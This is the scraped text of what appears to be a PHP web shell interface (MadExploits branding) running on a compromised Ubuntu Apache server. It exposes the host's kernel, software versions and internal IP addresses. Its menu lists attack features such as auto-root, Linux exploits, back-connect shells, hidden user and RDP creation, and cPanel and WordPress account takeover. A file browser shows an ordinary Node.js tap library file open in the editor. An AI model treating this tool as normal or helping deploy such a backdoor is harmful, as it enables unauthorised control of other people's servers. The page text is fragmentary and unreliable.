Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tap /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
base.js
5.96
KB
-rw-r--r--
clean-yaml-object.js
2.05
KB
-rw-r--r--
diags.js
130
B
-rw-r--r--
extra-from-error.js
1.05
KB
-rw-r--r--
mocha.js
3.7
KB
-rw-r--r--
obj-to-yaml.js
365
B
-rw-r--r--
parse-test-args.js
1.41
KB
-rw-r--r--
point.js
1.32
KB
-rw-r--r--
snapshot.js
2.32
KB
-rw-r--r--
spawn.js
3.49
KB
-rw-r--r--
stack.js
1022
B
-rw-r--r--
stdin.js
784
B
-rw-r--r--
synonyms.js
2.13
KB
-rw-r--r--
tap.js
5.25
KB
-rw-r--r--
test.js
35.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clean-yaml-object.js
'use strict' const cleanYamlObject = require('clean-yaml-object') const path = require('path') const Module = require('module') const fs = require('fs') const binpath = path.resolve(__dirname, '../bin') const stack = require('./stack.js') const Domain = require('domain').Domain const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key) const cleanTapYamlObject = object => { if (hasOwn(object, 'stack') && !hasOwn(object, 'at')) object.at = stack.parseLine(object.stack.split('\n')[0]) const file = object.at && object.at.file && path.resolve(object.at.file) if (file && (file.indexOf(__dirname) === 0 || file.indexOf(binpath) === 0)) delete object.at if (file && object.at && object.at.file && object.at.line && !object.source) { const content = (() => { try { return Module.wrap(fs.readFileSync(file)) } catch (er) {} })() if (content) { const csplit = (content.split('\n')[object.at.line - 1] || '').trim() if (csplit) object.source = csplit + '\n' } } return cleanYamlObject(object, yamlFilter) } const yamlFilter = (propertyName, isRoot, source, target) => source instanceof Domain ? false : !isRoot ? true : propertyName === 'stack' ? ( (source.stack ? target.stack = source.stack : false), false) : !(propertyName === 'todo' || propertyName === 'time' || /^_?tapChild/.test(propertyName) || /^tapStream/.test(propertyName) || /^tapMochaTest/.test(propertyName) || propertyName === 'cb' || propertyName === 'name' || propertyName === 'indent' || propertyName === 'skip' || propertyName === 'bail' || propertyName === 'grep' || propertyName === 'grepInvert' || propertyName === 'only' || propertyName === 'diagnostic' || propertyName === 'buffered' || propertyName === 'parent' || propertyName === 'domainEmitter' || propertyName === 'domainThrew' || propertyName === 'domain' || (propertyName === 'at' && !source.at)) module.exports = cleanTapYamlObject
Close